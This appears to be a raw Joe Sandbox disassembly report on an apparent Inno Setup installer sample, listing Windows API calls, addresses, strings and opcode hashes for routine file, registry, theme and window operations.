                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FocusMessageStateTextWaitWindow
                                                            • String ID: Wnd=$%x
                                                            • API String ID: 1381870634-2927251529
                                                            • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                            • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                            • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                            • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                            APIs
                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Time$File$LocalSystem
                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                            • API String ID: 1748579591-1013271723
                                                            • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                            • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                            • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                            • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                            APIs
                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                            • String ID: DeleteFile$MoveFile
                                                            • API String ID: 3024442154-139070271
                                                            • Opcode ID: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                            • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                            • Opcode Fuzzy Hash: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                            • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                            Strings
                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                            • CSDVersion, xrefs: 0048367C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                            • API String ID: 3677997916-1910633163
                                                            • Opcode ID: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                            • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                            • Opcode Fuzzy Hash: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                            • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                            • API String ID: 47109696-2631785700
                                                            • Opcode ID: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                            • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                            • Opcode Fuzzy Hash: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                            • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                            • API String ID: 1646373207-4063490227
                                                            • Opcode ID: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                            • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                            • Opcode Fuzzy Hash: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                            • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                            • API String ID: 1646373207-260599015
                                                            • Opcode ID: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                            • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                            • Opcode Fuzzy Hash: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                            • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: NotifyWinEvent$user32.dll
                                                            • API String ID: 1646373207-597752486
                                                            • Opcode ID: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                            • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                            • Opcode Fuzzy Hash: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                            • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                            • API String ID: 1646373207-834958232
                                                            • Opcode ID: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                            • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                            • Opcode Fuzzy Hash: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                            • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                            APIs
                                                              • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                              • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                            • API String ID: 2238633743-2683653824
                                                            • Opcode ID: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                            • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                            • Opcode Fuzzy Hash: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                            • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
                                                            APIs
                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                            • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileNext
                                                            • String ID:
                                                            • API String ID: 2066263336-0
                                                            • Opcode ID: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                            • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                            • Opcode Fuzzy Hash: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                            • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                            APIs
                                                              • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                              • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                            • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CountErrorFileLastMoveTick
                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                            • API String ID: 2406187244-2685451598
                                                            • Opcode ID: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                            • Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
                                                            • Opcode Fuzzy Hash: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                            • Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00413D56
                                                            • GetDesktopWindow.USER32 ref: 00413E0E
                                                              • Part of subcall function 00418ED0: 6FA0C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                              • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                            • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CursorDesktopWindow$Show
                                                            • String ID:
                                                            • API String ID: 2074268717-0
                                                            • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                            • Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
                                                            • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                            • Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: LoadString$FileMessageModuleName
                                                            • String ID:
                                                            • API String ID: 704749118-0
                                                            • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                            • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                            • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                            • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                            APIs
                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                              • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                              • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                            • IsRectEmpty.USER32(?), ref: 0044E963
                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                            • String ID:
                                                            • API String ID: 855768636-0
                                                            • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                            • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                            • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                            • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                            APIs
                                                            • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                            • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                            • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                            • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: OffsetRect
                                                            • String ID:
                                                            • API String ID: 177026234-0
